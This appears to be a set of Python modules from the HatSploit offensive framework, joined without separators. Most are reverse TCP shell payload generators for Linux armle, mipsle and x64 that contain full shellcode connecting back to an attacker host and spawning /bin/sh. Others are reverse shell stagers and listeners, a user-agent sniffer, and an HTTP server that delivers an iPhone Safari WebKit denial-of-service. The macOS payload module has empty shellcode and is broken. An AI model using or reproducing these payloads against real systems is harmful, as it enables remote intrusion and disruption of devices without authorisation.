class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "macOS x64 Shell Reverse TCP", 'Module': "payload/macos/x64/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for macOS x64.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "macho", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): bind_port, file_format, local_file = self.parser.parse_options( self.options) bind_port = self.payload.port_to_bytes(bind_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = (b"") self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'x64', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): tcp = tcp() handler = handler details = { 'Name': "iPhoneOS MobileSafari.app WebKit Filter DoS", 'Module': "exploit/iphoneos/mobile_safari_app/webkit_filter_dos", 'Authors': ['enty8080'], 'Description': "iPhoneOS 9.1 till 12.1 MobileSafari.app WebKit Filter DoS.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 80, 'Type': "port", 'Required': True }, 'FOREVER': { 'Description': "Start http server forever.", 'Value': "no", 'Type': "boolean", 'Required': False } } def start_server(self, local_host, local_port, forever): try: httpd = socketserver.TCPServer((local_host, int(local_port)), self.handler) self.badges.output_process("Starting http server on port " + local_port + "...") self.badges.output_process("Serving payload on http server...") if forever.lower() in ['yes', 'y']: while True: self.badges.output_process("Listening for connections...") httpd.handle_request() else: self.badges.output_process("Listening for connections...") httpd.handle_request() except Exception: self.badges.output_error("Failed to start http server on port " + local_port + "!") def run(self): local_host, local_port, forever = self.parser.parse_options( self.options) self.start_server(local_host, local_port, forever)
class HatSploitModule(HatSploitModule): tcp = tcp() handler = handler details = { 'Name': "User Agent Sniffer", 'Module': "auxiliary/multi/sniffer/user_agent_sniffer", 'Authors': ['enty8080'], 'Description': "Sniff User-Agent through URL.", 'Dependencies': [''], 'Comments': [''], 'Risk': "medium" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 80, 'Type': "port", 'Required': True }, 'FOREVER': { 'Description': "Start http server forever.", 'Value': "no", 'Type': "boolean", 'Required': False } } def start_server(self, local_host, local_port, forever): try: httpd = socketserver.TCPServer((local_host, int(local_port)), self.handler) self.badges.output_process("Starting http server on port " + local_port + "...") if forever.lower() in ['yes', 'y']: while True: self.badges.output_process("Listening for connections...") httpd.handle_request() else: self.badges.output_process("Listening for connections...") httpd.handle_request() except Exception: self.badges.output_error("Failed to start http server on port " + local_port + "!") def run(self): local_host, local_port, forever = self.parser.parse_options( self.options) self.start_server(local_host, local_port, forever)
class HatSploitModule(HatSploitModule): tcp = tcp() handler = handler() details = { 'Name': "Shell Reverse TCP Stager", 'Module': "exploit/multi/stager/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Cross-platform reverse TCP shell.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FOREVER': { 'Description': "Start listener forever.", 'Value': "no", 'Type': "boolean", 'Required': False } } def run(self): local_host, local_port, forever = self.parser.parse_options( self.options) if self.handler.start_handler(local_host, local_port): if forever.lower() in ['yes', 'y']: while True: if not self.handler.handle_session( self.details['Module'], "multi/shell", local_host, local_port): return else: if not self.handler.handle_session(self.details['Module'], "multi/shell", local_host, local_port): return
class HatSploitModule(HatSploitModule): sessions = sessions() tcp = tcp() listener = listener() session = None id_number = 0 details = { 'Name': "Linux Membrane Reverse TCP Stager", 'Module': "exploit/linux/stager/membrane_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Linux reverse TCP shell with full remote functionality.", 'Dependencies': [''], 'Comments': [''], 'Risk': "high" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FOREVER': { 'Description': "Start listener forever.", 'Value': "no", 'Type': "boolean", 'Required': False } } def add_session(self, session, local_port, address): self.sessions.add_session("linux/membrane", self.id_number, self.details['Module'], address, local_port, session) self.badges.output_success("Session " + str(self.id_number) + " opened!") self.id_number += 1 def start_listener(self, forever, local_host, local_port): self.badges.output_process("Starting listener on port " + local_port + "...") try: server = self.listener.start_listener(local_host, local_port) except Exception: return if forever.lower() in ['yes', 'y']: while True: try: session, address = self.listener.listen( local_host, local_port, server) except Exception: return if session: self.add_session(session, local_port, address) else: try: session, address = self.listener.listen( local_host, local_port, server) except Exception: return if session: self.add_session(session, local_port, address) def run(self): local_host, local_port, forever = self.parser.parse_options( self.options) self.start_listener(forever, local_host, local_port)
class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "Linux armle Shell Reverse TCP", 'Module': "payload/linux/armle/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for Linux armle.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): local_host, local_port, file_format, local_file = self.parser.parse_options( self.options) local_host = self.payload.host_to_bytes(local_host) local_port = self.payload.port_to_bytes(local_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x01\x10\x8F\xE2" + b"\x11\xFF\x2F\xE1" + b"\x02\x20\x01\x21" + b"\x92\x1A\x0F\x02" + b"\x19\x37\x01\xDF" + b"\x06\x1C\x08\xA1" + b"\x10\x22\x02\x37" + b"\x01\xDF\x3F\x27" + b"\x02\x21\x30\x1c" + b"\x01\xdf\x01\x39" + b"\xFB\xD5\x05\xA0" + b"\x92\x1a\x05\xb4" + b"\x69\x46\x0b\x27" + b"\x01\xDF\xC0\x46" + b"\x02\x00" + local_port + # "\x12\x34" struct sockaddr and port local_host + # reverse ip address b"\x2f\x62\x69\x6e" + # /bin b"\x2f\x73\x68\x00" # /sh\0 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'armle', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "Linux mipsle Shell Reverse TCP", 'Module': "payload/linux/mipsle/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for Linux mipsle.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): local_host, local_port, file_format, local_file = self.parser.parse_options( self.options) local_host = self.payload.host_to_bytes(local_host) local_port = self.payload.port_to_bytes(local_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\xff\xff\x04\x28" + # slti a0,zero,-1 b"\xa6\x0f\x02\x24" + # li v0,4006 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\x11\x11\x04\x28" + # slti a0,zero,4369 b"\xa6\x0f\x02\x24" + # li v0,4006 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xfd\xff\x0c\x24" + # li t4,-3 b"\x27\x20\x80\x01" + # nor a0,t4,zero b"\xa6\x0f\x02\x24" + # li v0,4006 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xfd\xff\x0c\x24" + # li t4,-3 b"\x27\x20\x80\x01" + # nor a0,t4,zero b"\x27\x28\x80\x01" + # nor a1,t4,zero b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\x57\x10\x02\x24" + # li v0,4183 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xff\xff\x44\x30" + # andi a0,v0,0xffff b"\xc9\x0f\x02\x24" + # li v0,4041 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\xc9\x0f\x02\x24" + # li v0,4041 b"\x0c\x09\x09\x01" + # syscall 0x42424 local_port + b"\x05\x3c" + # "\x7a\x69" lui a1,0x697a b"\x02\x00\xa5\x34" + # ori a1,a1,0x2 b"\xf8\xff\xa5\xaf" + # sw a1,-8(sp) local_host[2:] + b"\x05\x3c" + # "\x00\x01" lui a1,0x100 local_host[:2] + b"\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f b"\xfc\xff\xa5\xaf" + # sw a1,-4(sp) b"\xf8\xff\xa5\x23" + # addi a1,sp,-8 b"\xef\xff\x0c\x24" + # li t4,-17 b"\x27\x30\x80\x01" + # nor a2,t4,zero b"\x4a\x10\x02\x24" + # li v0,4170 b"\x0c\x09\x09\x01" + # syscall 0x42424 b"\x62\x69\x08\x3c" + # lui t0,0x6962 b"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f b"\xec\xff\xa8\xaf" + # sw t0,-20(sp) b"\x73\x68\x08\x3c" + # lui t0,0x6873 b"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e b"\xf0\xff\xa8\xaf" + # sw t0,-16(sp) b"\xff\xff\x07\x28" + # slti a3,zero,-1 b"\xf4\xff\xa7\xaf" + # sw a3,-12(sp) b"\xfc\xff\xa7\xaf" + # sw a3,-4(sp) b"\xec\xff\xa4\x23" + # addi a0,sp,-20 b"\xec\xff\xa8\x23" + # addi t0,sp,-20 b"\xf8\xff\xa8\xaf" + # sw t0,-8(sp) b"\xf8\xff\xa5\x23" + # addi a1,sp,-8 b"\xec\xff\xbd\x27" + # addiu sp,sp,-20 b"\xff\xff\x06\x28" + # slti a2,zero,-1 b"\xab\x0f\x02\x24" + # li v0,4011 b"\x0c\x09\x09\x01" # syscall 0x42424 ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'mipsle', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")
class HatSploitModule(HatSploitModule): tcp = tcp() payload = payload() details = { 'Name': "Linux x64 Shell Reverse TCP", 'Module': "payload/linux/x64/shell_reverse_tcp", 'Authors': ['enty8080'], 'Description': "Shell Reverse TCP Payload for Linux x64.", 'Dependencies': [''], 'Comments': [''], 'Risk': "low" } options = { 'LHOST': { 'Description': "Local host.", 'Value': tcp.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Output format.", 'Value': "elf", 'Type': None, 'Required': True }, 'LPATH': { 'Description': "Local path.", 'Value': "/tmp/payload.bin", 'Type': None, 'Required': True } } def run(self): local_host, local_port, file_format, local_file = self.parser.parse_options( self.options) local_host = self.payload.host_to_bytes(local_host) local_port = self.payload.port_to_bytes(local_port) if not file_format in self.payload.formats.keys(): self.badges.output_error("Invalid format!") return self.badges.output_process("Generating shellcode...") shellcode = ( b"\x6a\x29" + # pushq $0x29 b"\x58" + # pop %rax b"\x99" + # cltd b"\x6a\x02" + # pushq $0x2 b"\x5f" + # pop %rdi b"\x6a\x01" + # pushq $0x1 b"\x5e" + # pop %rsi b"\x0f\x05" + # syscall b"\x48\x97" + # xchg %rax,%rdi b"\x48\xb9\x02\x00" + # movabs $0x100007fb3150002,%rcx local_port + # port local_host + # ip b"\x51" + # push %rcx b"\x48\x89\xe6" + # mov %rsp,%rsi b"\x6a\x10" + # pushq $0x10 b"\x5a" + # pop %rdx b"\x6a\x2a" + # pushq $0x2a b"\x58" + # pop %rax b"\x0f\x05" + # syscall b"\x6a\x03" + # pushq $0x3 b"\x5e" + # pop %rsi b"\x48\xff\xce" + # dec %rsi b"\x6a\x21" + # pushq $0x21 b"\x58" + # pop %rax b"\x0f\x05" + # syscall b"\x75\xf6" + # jne 27 <dup2_loop> b"\x6a\x3b" + # pushq $0x3b b"\x58" + # pop %rax b"\x99" + # cltd b"\x48\xbb\x2f\x62\x69\x6e\x2f" + # movabs $0x68732f6e69622f,%rbx b"\x73\x68\x00" + # b"\x53" + # push %rbx b"\x48\x89\xe7" + # mov %rsp,%rdi b"\x52" + # push %rdx b"\x57" + # push %rdi b"\x48\x89\xe6" + # mov %rsp,%rsi b"\x0f\x05" # syscall ) self.badges.output_process("Generating payload...") payload = self.payload.generate(file_format, 'x64', shellcode) self.badges.output_process("Saving to " + local_file + "...") with open(local_file, 'wb') as f: f.write(payload) self.badges.output_success("Successfully saved to " + local_file + "!")